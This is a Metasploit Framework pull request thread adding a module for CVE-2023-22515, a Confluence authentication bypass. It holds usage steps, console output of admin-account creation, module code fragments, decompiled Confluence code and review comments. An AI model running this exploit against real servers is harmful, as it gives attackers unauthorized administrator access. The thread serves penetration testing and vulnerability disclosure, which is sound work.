CVE-2023-22515 - Atlassian Confluence Data Center and Server Authentication Bypass
rapid7/metasploit-framework pull request #18447
Opened 2023-10-11 19:12 UTC by emirpolatt

# Description

This module exploits an Broken Access Control vulnerability in Atlassian Confluence servers leads to Authentication Bypass.

A specially crafted request can be create new admin account without authorization in the Atlassian server.
## Vulnerable Application
Affecting Atlassian Confluence from version 8.0.0 to before 8.3.3, from version 8.4.0 before 8.4.3 and from version 8.5.0 before 8.5.2.

## Verification Steps

- [ ] Setting up a working installation of Atlassian Confluence Server before 8.0.0
- [ ] Start `msfconsole`
- [ ] `use use auxiliary/admin/http/atlassian_confluence_auth_bypass`
- [ ] `set RHOST <IP>`
- [ ] `set RPORT <PORT>`
- [ ] `check`
- [ ] You should see `The target is vulnerable`
- [ ] `set NEW_USERNAME <username>`
- [ ] `set NEW_PASSWORD <password>`
- [ ] `run`
- [ ] You should get a new admin account. 

## Options
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
- **NEW_USERNAME**: Username to be used when creating a new user with admin privileges.
- **NEW_PASSWORD**: Password to be used when creating a new user with admin privileges.
- **NEW_EMAIL**: E-mail to be used when creating a new user with admin privileges.

## Scenarios
## Tested on Confluence Server 8.0.0 with Linux target (Ubuntu 20.04)
```
msf6 > use auxiliary/multi/http/atlassian_confluence_auth_bypass
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
RHOSTS => <YOUR_TARGET>
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
NEW_USERNAME => admin_1337
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
NEW_PASSWORD => admin_1337
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against <YOUR_TARGET>

[+] Admin user was created successfully. Credentials: admin_1337 - admin_1337
[+] Now you can login as adminstrator from: http://<YOUR_TARGET>:8090/login.action
[*] Auxiliary module execution completed
```

2023-10-12 15:00 UTC, cgranleese-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          ['CVE', '2023-22515'],
Could we possibly add a link to the AttackerKB analysis here:
```
https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
```

2023-10-12 15:00 UTC, cgranleese-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +  def get_confluence_version
Maybe we can just roll this method into the check method above.

2023-10-12 15:00 UTC, cgranleese-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    return @confluence_version if @confluence_version
We could look at removing the caching here and just have it call the full check routine each time.

2023-10-12 15:00 UTC, cgranleese-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    Exploit::CheckCode::Vulnerable("Confluence version: #{confluence_version}")
```suggestion
    Exploit::CheckCode::Appears("Confluence version: #{confluence_version}")
```

2023-10-12 15:00 UTC, cgranleese-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
We think this can be removed as it isn't required as part of the calls your making here.

2023-10-12 15:00 UTC, cgranleese-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
Same as above.

2023-10-12 20:23 UTC, jvoisin requested changes

2023-10-12 20:23 UTC, jvoisin commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          This module exploits an Broken Access Control vulnerability in Atlassian Confluence servers leads to Authentication Bypass.
```suggestion
          This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
```

2023-10-12 20:23 UTC, jvoisin commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          A specially crafted request can be create new admin account without authorization in the Atlassian server.
```suggestion
          A specially crafted request can be create new admin account without authentication on the target Atlassian server.
```

2023-10-12 20:23 UTC, jvoisin commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', 'admin_1337']),
Please make those random, via `Rex::Text.rand_text_alpha(8)`. This will make the module less obvious to fingerprint, and also won't give other people access to the server :p

2023-10-12 20:23 UTC, jvoisin commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    unless (confluence_version < Rex::Version.new('8.3.3')) && Rex::Version.new('8.4.3') && Rex::Version.new('8.5.2')
This check is broken, and doesn't do what you think it does. Maybe you should split it into several checks.

2023-10-13 08:58 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          ['CVE', '2023-22515'],
> Could we possibly add a link to the AttackerKB analysis here:
> 
> ```
> https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
> ```

I've added the AttackerKB analysis. Commit id: 9219a3e90abbc54ff4da71513e4ab9c2e371d8d4

2023-10-13 09:19 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
No, these are necessary for a explotation. Maybe version control can be done from a different endpoint

2023-10-13 09:19 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
No, these are necessary for a explotation.

2023-10-13 09:21 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', 'admin_1337']),
I fix it, thank you for suggestion :)

2023-10-13 09:34 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    unless (confluence_version < Rex::Version.new('8.3.3')) && Rex::Version.new('8.4.3') && Rex::Version.new('8.5.2')
I tried to fix it, but I'm not sure it's fully working. Can you check? 
Commit id: 3e42e41a08c460e8e5676c0beaef1f611711d156

2023-10-13 09:36 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
I have started checking the version from the **login.action** endpoint. In case the **server-info.action** page cannot be found on the server (it is missing in the new patches), I will add different warning messages.

2023-10-13 09:45 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +  def get_confluence_version
I have rolled the functions of this method in the Check method.

2023-10-13 09:45 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    return @confluence_version if @confluence_version
Removed caching. 
Commit: e94ce333fc10382ffbd276054305f6d01b5684c6

2023-10-13 09:59 UTC, h00die commented on documentation/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.md
> +- [ ] Setting up a working installation of Atlassian Confluence Server before 8.0.0
change these to being numbered

2023-10-13 09:59 UTC, h00die commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
['URL', 'https://twitter.com/Dinosn/status/1712158087862218958']

2023-10-13 09:59 UTC, h00die commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          'Reliability' => [REPEATABLE_SESSION],
blank this list out, it doesn't give a session

2023-10-13 09:59 UTC, h00die commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
https://twitter.com/Dinosn/status/1712158087862218958 shows it as required as well

2023-10-13 09:59 UTC, h00die commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    end
Are these correct? for instance the first check is > 8.3.3. and also less than 8.0.0 which is mutually exclusive.
I'd also look to combine these 3  `if` statements into one

2023-10-13 10:42 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
This PoC is not enough for explotation.

2023-10-13 10:44 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +          'Reliability' => [REPEATABLE_SESSION],
I added it because Rubocop gave a warning. Also, the exploit leaves an error message in the log files. I can still remove it if you want

2023-10-13 10:46 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    end
For 8.0.0 and earlier, the exploit does not work. It can only be triggered for versions between 8.0.0 and 8.3.3, 8.4.0 and 8.4.3 and 8.5.0, 8.5.2. That's why there is such a control.
Also can you help me how I can write If structures in this context in one go?

2023-10-13 10:57 UTC, h00die commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    end
This is reversed logic, so you'd want to replace the final line of this function, however:

```
if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.3')) ||
  confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
  confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2'))
  return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
end
```

2023-10-13 11:38 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    end
Okay, thank you. I fixed it with your suggestion.

Commit: 63fca67f57f97a526c31d015782e693754fe9bff

2023-10-13 11:47 UTC, sfewer-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
The `X-Atlassian-Token` header is not required for the `server-info.action` endpoint. If we decompile the `ServerInfoAction` class:

```java
package com.atlassian.confluence.core.actions;

import com.atlassian.annotations.security.XsrfProtectionExcluded;
import com.atlassian.confluence.core.ConfluenceActionSupport;
import com.atlassian.confluence.security.access.annotations.PublicAccess;
import com.atlassian.xwork.HttpMethod;
import com.atlassian.xwork.PermittedMethods;

public class ServerInfoAction extends ConfluenceActionSupport {
  @PermittedMethods({HttpMethod.ANY_METHOD})
  @XsrfProtectionExcluded // <---
  @PublicAccess
  public String execute() throws Exception {
    return "success";
  }
}
```

We can see it annotated with `@XsrfProtectionExcluded`. If we then decompile `com.atlassian.xwork.interceptors.XsrfTokenInterceptor` which intercepts HTTP requests and enforces the XSRF checks, we can see that classes annotated with `@XsrfProtectionExcluded` are exempt from the checks.

```java
  public String intercept(ActionInvocation invocation) throws Exception {
    Method invocationMethod = extractMethod(invocation);
    String configParam = (String)invocation.getProxy().getConfig().getParams().get("RequireSecurityToken");
    RequireSecurityToken legacyAnnotation = invocationMethod.<RequireSecurityToken>getAnnotation(RequireSecurityToken.class);
    XsrfProtectionExcluded annotation = invocationMethod.<XsrfProtectionExcluded>getAnnotation(XsrfProtectionExcluded.class); // <---
    boolean isProtected = methodRequiresProtection(configParam, annotation, legacyAnnotation);
    String token = ServletActionContext.getRequest().getParameter("atl_token");
    boolean validToken = this.tokenGenerator.validateToken(ServletActionContext.getRequest(), token);
    if (isProtected && !validToken) {// <---
      Action action = (Action)invocation.getAction();
      String errorMessageKey = (token == null) ? "atlassian.xwork.xsrf.notoken" : "atlassian.xwork.xsrf.badtoken";
      addInvalidTokenError(action, errorMessageKey);
      ServletActionContext.getResponse().setStatus(403);
      return "input";
    } 
    return invocation.invoke();
  }

  private boolean methodRequiresProtection(String configParam, XsrfProtectionExcluded annotation, RequireSecurityToken legacyAnnotation) {
    if (isOverrideHeaderPresent())
      return false; 
    if (annotation != null)
      return false;  //<---
    if (configParam != null)
      return Boolean.parseBoolean(configParam); 
    if (legacyAnnotation != null)
      return legacyAnnotation.value(); 
    return getSecurityLevel().getDefaultProtection();
  }
```

We can still pass the header, but it is not required. Other action endpoints will require the header, but not `server-info.action`

2023-10-13 11:54 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
Hi @sfewer-r7 

Yeah, that's right. I removed the X-Atlassian-Token header from the requests to server-info.action and login.action endpoints and the exploit worked properly again. 

Commit: 62e1a1244ff2d7286b1f162192cfaa28e9f89a3b

2023-10-13 12:44 UTC, sfewer-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +        'X-Atlassian-Token' => 'no-check'
Awesome, thank you.

2023-10-13 13:06 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    unless (confluence_version < Rex::Version.new('8.3.3')) && Rex::Version.new('8.4.3') && Rex::Version.new('8.5.2')
Okay, I did it. Now it's work properly. It's check the vulnerable versions range. 

Commit: 63fca67f57f97a526c31d015782e693754fe9bff

2023-10-16 15:36 UTC, tdzmont commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302
I have an 8.4.2 vulnerable setup but it does not return a 302 here, It returns a 200 with a "success" message in the html body, so as written the module stops here.  Changing the code check to 200 did allow it to continue successfully, though that is probably not a good enough success check on its own.

2023-10-18 13:54 UTC, adfoster-r7 commented
@msjenkins-r7 retest this please

2023-10-19 11:04 UTC, emirpolatt commented on documentation/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.md
> +- [ ] Setting up a working installation of Atlassian Confluence Server before 8.0.0
Okay, I changed it via 49e736f5e8316217d6f58f042eae7bbd23d5a710

2023-10-19 11:05 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302
Yes you right, I changed the control there via 49e736f5e8316217d6f58f042eae7bbd23d5a710

2023-10-19 18:17 UTC, smcintyre-r7 requested changes
I gave this a test and ran into a few issues with the `#check` method. The most important of which was a crash when `nil` was being returned. I left a few suggestions to address all the problems I noticed.

With those changes in place, everything appears to be working as intended. I tested it against Confluence 8.3.2 on a Windows target.

2023-10-19 18:17 UTC, smcintyre-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Admin user was created but setup could not be completed.') unless res&.code == 200
If this function calls `fail_with` because the user runs the module more than once, then the next request to complete the setup will not be made. That will cause Confluence to be left in a state where the module won't run again, and a user will have to click a button on the web page.

I would suggest updating `#create_admin_user` to return a boolean to indicate whether or not the module succeeded. Then here, it should perform the next HTTP request, then check whether or not the creation succeeded.

```suggestion
    created_user = create_admin_user

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      }
    )
    
    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created

    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200
```

This also switches the second `fail_with` to a print_warning. That way if the user was created by setup could not be completed for anyreason, the user will still see the creds and they'll be added to the database.

2023-10-19 19:33 UTC, emirpolatt commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
Uh, I didn't know how to save them as logs to the database before. It was really good to learn this. I have committed this suggestion via a4ecc06067f5edf862d69a009745674fd27dd8c6 , thanks

2023-10-19 19:41 UTC, smcintyre-r7 requested changes

2023-10-19 19:41 UTC, smcintyre-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created
I made a typo here, this should have been `created_user` not just `created`.
```suggestion
    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user
```

2023-10-19 19:41 UTC, smcintyre-r7 commented on modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
> +    print_good('Setup reverted back to the beginning. Attempting to create new admin user!')
Since `#created_admin_user` is expected to return a boolean now, this should just be:

```suggestion
    res&.code == 302
```

That'll simply return `true` when `res.code == 302` because the user was created successfully.

2023-10-19 21:16 UTC, smcintyre-r7 approved these changes
Module looks good to me now, and the tests are showing that it's working as intended now.

<details>
<summary>Testing Output</summary>

In the following output, you'll see that the check method works and then the run method creates the account. When the module is run a second time, it fails because the user was already created. This is expected and reasonable behavior. You'll also see that even after the user creation fails, the check method continues to work which was an issue previously because the setup steps had not be finished.

```
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > show options 

Module options (auxiliary/admin/http/atlassian_confluence_auth_bypass):

   Name          Current Setting     Required  Description
   ----          ---------------     --------  -----------
   NEW_EMAIL     sung@haley.example  yes       E-mail to be used when creating a new user with admin privileges
   NEW_PASSWORD  lzZjyRop            yes       Password to be used when creating a new user with admin privileges
   NEW_USERNAME  gearldine.feeney    yes       Username to be used when creating a new user with admin privileges
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.159.10      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8090                yes       The target port (TCP)
   SSL           false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                   yes       Base path
   VHOST                             no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against 192.168.159.10

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
[+] Found server-info.action! Trying to ignore setup.
[+] Admin user was created successfully. Credentials: gearldine.feeney - lzZjyRop
[+] Now you can login as administrator from: http://192.168.159.10:8090/login.action
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against 192.168.159.10

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
[+] Found server-info.action! Trying to ignore setup.
[-] Auxiliary aborted due to failure: no-access: The admin user could not be created. Try a different username.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > creds
Credentials
===========

host            origin          service                          public            private   realm  private_type  JtR Format
----            ------          -------                          ------            -------   -----  ------------  ----------
192.168.159.10  192.168.159.10  8090/tcp (Atlassian Confluence)  gearldine.feeney  lzZjyRop         Password      

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > 
```
</details>

I made some changes in [ee0e5b9](https://github.com/rapid7/metasploit-framework/pull/18447/commits/ee0e5b9eda7eb1ae24c3890fc05dab3923dd0b94) to tidy up the docs and fix an issue I noticed where the module would fail when the username contained a capital letter.

2023-10-19 21:35 UTC, merged

2023-10-19 21:37 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit for CVE-2023-22515 which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.